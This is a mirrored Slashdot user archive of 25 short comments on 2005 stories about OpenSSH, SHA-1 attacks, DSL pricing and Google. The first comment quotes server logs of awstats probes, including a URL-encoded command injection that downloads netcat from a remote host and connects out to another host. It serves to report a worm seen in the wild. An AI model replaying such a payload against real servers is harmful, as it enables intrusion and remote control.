Slashdot Mirror


User: statemachine

statemachine's activity in the archive.

Stories: 0
Comments: 575

Comments · 575

  1. Been in the wild since Feb. on Linux Lupper.Worm In the Wild · · Score: 1

    Or is this a different worm that exploits awstats?

    First scan at my webserver:

    xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    Second scan:

    xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:

    xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%20something4u.propagation.net%2065000%20%7c%20 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

  2. Re:It does not help... on SSH Claims Draw Open Source Ire · · Score: 1

    And like last time, I told you that the problem is simply that OpenSSH wants to compile and run the binary during its tests. You do not need a cross-compile environment to fix this. There are too many "tests" that require running the binary for me to fix up into a nice package. They are easy to spot but tedious to correct/hack for each release.

    And like last time, I gave you the necessary information for you to find it. I don't have the time to hold your hand, nor formulate a good looking patch for you. And I'm damned sure that I'm not going to give out my contact information when your team and its sympathizers are full of immature brats.

    I've since recommended a different solution and moved on to a different project.

  3. Re:It does not help... on SSH Claims Draw Open Source Ire · · Score: 2, Insightful

    You are completely correct. This is OpenSSH's problem. Patches not getting folded in, responses like "where's YOUR patch, pickledick?", and the utter lack of OpenSSH programmers taking the initiative to fix stupid problems like cross-platform compiling on a non-target CPU.

    I don't doubt that OpenSSH is enterprise-class when compared with the likes of Microsoft's offerings or SSH Corp., but immature responses from the supposed "OpenSSH developers" that don't further to solve the problems really put people off.

    If OpenSSH would clean house of the wannabes and show some initiative and maturity, the OpenSSH team might get more respect from the outsiders.

  4. Re:Typical bureaucrat on NASA Admin Says Shuttle and ISS are Mistakes · · Score: 1

    "- Exactly what would Mr Smartypants have had us do with the money?"

    He would've put it in his pants and done the SmartyDance. Oooh Ah.

  5. Re:could just do what cable companies do... on FCC May Push Bells to Unbundle DSL · · Score: 1

    Interesting. Out here in San Jose, CA it's the way I've described. Must be regional...

  6. Re:could just do what cable companies do... on FCC May Push Bells to Unbundle DSL · · Score: 1

    You worded your statement oddly, so a reader might have some confusion. My apologies in advance if this offends you.

    Comcast HSI (High Speed Internet) by itself costs less than HSI + TV. However, if one buys the bundle, HSI gets a discount. But, the discounted HSI + TV still costs more than unbundled HSI!

  7. Misunderstood title? on Roundtable on Apple's Future · · Score: 1

    Did anyone else wonder why a pizza chain was commenting on a computer company?

  8. Re:Sadly True on Scientist Says Most Scientific Papers Are Wrong · · Score: 1

    ...but I'm generally ignored or told to fix it myself though that isn't my job.

    So true. Just like OpenSSH.

  9. Link to Actual Paper on Scientists Speed up Light · · Score: 2, Informative

    I'm not sure if anyone already posted the actual paper. ScienceBlog only links to itself and references a future printed publication. Well, here it is:

    http://www.opticsexpress.org/abstract.cfm?URI=OPEX-13-1-82

  10. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    You're still badgering me. I pointed out the version that I read and you're still acting like a troll.

    I won't apologize to you. You are a troll.

  11. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    Thank you for the link and the pointer to the text.

    I will concede that there was a link to *one* of the recently published papers, and had I examined every single link, I would have found *one* of those papers, albeit from a non-primary source.

    However, you must concede that "The authors have presented a collision for 58-round SHA-1, claimed to be found with 233 hash operations. The paper with a the full attack description is now online. [8]" is missing the reference in the later versions (the one I originally read):
    http://en.wikipedia.org/w/index.php?title=SHA_hash_functions&oldid=21330286
    Note that this phrase "* "Research paper containing the details of the attack on SHA-1" on Cryptome" that you quote is also missing from that version.

  12. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    Proof?

  13. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    You didn't even read my comment. Pot. Kettle. Black.

  14. Re:Sorry, no proof? on New, Faster Attack against SHA-1 Revealed · · Score: 1

    As I said in replies further down, the information I was seeking was added to Bruce's blog and to the Wiki *after* I posted my request.

    I honestly just wanted to see the papers. Since the links were not there, was my skepticism unfounded? Am I to blindly trust Bruce Schneier? (That may contradict everything I've read from him.)

  15. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    I forgot to add, the Wiki was updated with the papers only AFTER I posted my question.

    (cur) (last) 01:48, 19 August 2005 Matt Crypto (links for CRYPTO 2005 papers)

    Possibly Matt Crypto read my comment. Thank you Matt Crypto.

  16. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    quoth Schneier's blog:

    "EDITED TO ADD: Here are Xiaoyun Wang's two papers from Crypto this week: "Efficient Collision Search Attacks on SHA-0" and "Finding Collisions in the Full SHA-1Collision Search Attacks on SHA1." And here are the rest of her papers."

    When I read his blog (when the slashdot article appeared), there was no such reference. Apparently he read my comment. Thanks Bruce.

    By the way, clap_hands, you're still a troll.

  17. Re:links to papers on New, Faster Attack against SHA-1 Revealed · · Score: 1

    As I said in another reply, my apologies to you j1m+5n0w. While the article does not have any useful links, you did provide a link to the papers.

    That was the information I was asking for.

  18. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    They don't have direct links. If you consider a link to another Wiki article which links another page which links another page a direct link....

    *You* (clap_hands) have not provided any link. Only j1m+5n0w provided a link.

    And I apologize to j1m+5n0w because I see that he did provide a direct link to the papers. Neither of which was provided in the article, or Bruce's blog.

    But no apologies to you. You're merely trying to stir up trouble (hey! I didn't even reply to you until now, so why did you respond to my response to j1m+5n0w?).

  19. Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    I didn't miss anything. The Wiki articles just reference Bruce's blog, which doesn't provide any proof.

    I don't see how you're modded informative, and I'm modded a troll, since I asked a valid question, and you didn't provide the answer.

    Please, *please* provide a link to the proof.

  20. Sorry, no proof? on New, Faster Attack against SHA-1 Revealed · · Score: 0, Troll

    Even the greats like Bruce can get hoaxed.

    This Chinese research team has yet to publish their proof for the last SHA attacks. Or maybe I missed it? Please show everyone the proof. I honestly want to be able to read the proof. Links, please.

    If it's real, withholding information on these attack vectors doesn't make it any safer for the rest of us who use SHA or any other algorithm.

  21. Sounds like OpenSSH on IBM Donates Code to Firefox · · Score: 1

    No useful documentation (provide your own!). No useful support (provide a patch!).

    Something tells me that most of these programmers have never worked on a commercial project with a deadline and with other people.

    Bunch of arrogant prima donnas. Just like OpenSSH.

  22. LoJack on RFID Tags in Law Enforcement · · Score: 1

    There's a stolen car tracking device called LoJack. It's international, too. Of course, you need to have it installed before the car is stolen.

  23. Re:Insider trades on Another Internet Stock Price Bubble Building? · · Score: 1

    Wow. They're minting money over at Google.
    http://finance.yahoo.com/q/it?s=GOOG

    Some large option exercise at $0 a share, followed by several smaller sales at market price. Ad infinitum.

    Create some stock, sell it. Create some more, sell some more. All the while keeping the same percentage of stock for themselves.

  24. Moderators are ridiculous on Google's Share of Searches Falling? Or Increasing? · · Score: 1

    How is the grandparent flamebait and my reply redundant?

    Obviously some member doesn't agree with either of us and wants to use his new mod points to silence a point of view.

    The moderation is utterly ridiculous. I'm not new here, but it's not any less insane to see it personally.

  25. Re:The earth is flat on Google's Share of Searches Falling? Or Increasing? · · Score: 0, Redundant

    So if I see some arbitrary absurdity on a line chart then it cancels all meaning of all other studies?

    Welcome to American politics.

    That technique is used to contradict Global Warming, evolution, environmental studies, and legalities that don't fit arrogant people's ignorant views.